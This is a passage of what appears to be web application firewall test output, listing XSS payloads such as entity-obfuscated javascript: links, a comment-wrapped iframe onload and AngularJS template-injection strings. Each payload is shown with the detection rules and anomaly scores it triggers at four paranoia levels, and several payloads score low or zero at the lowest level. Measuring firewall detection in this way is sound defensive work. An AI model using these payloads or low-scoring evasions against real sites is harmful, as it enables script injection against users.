921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 75
****** payload-145 ********
Payload:
payload=<a href="javascript&amp;colon;alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-146 ********
Payload:
payload=<a href="java&amp;Tab;script:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-147 ********
Payload:
payload=<a href="java&amp;NewLine;script:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-148 ********
Payload:
payload=<a href="javascript&amp;colon;alert&amp;lpar;1&amp;rpar;">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 75
****** payload-149 ********
Payload:
payload=<a href="javascript:x='%27-alert(1)-%27';">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 48
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 69
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 82
****** payload-150 ********
Payload:
payload=<a href="javascript:x='&amp;percnt;27-alert(1)-%27';">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 56
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 72
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 93
****** payload-151 ********
Payload:
payload=<a href="javascript&amp;#x6a;avascript:alert(1)">Firefox</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 53
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-152 ********
Payload:
payload=<a href="javascript&amp;colon;alert(1)">Firefox</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-153 ********
Payload:
payload=<!-- ><img title="--><iframe/onload=alert(1)>"> -->
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-154 ********
Payload:
payload=<!-- ><img title="--><iframe/onload=alert(1)>"> --></a>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-155 ********
Payload:
payload={{constructor.constructor(&#039;alert(1)&#039;)()}}</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 18
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-156 ********
Payload:
payload={{$on.constructor('alert(1)')()}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 13
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
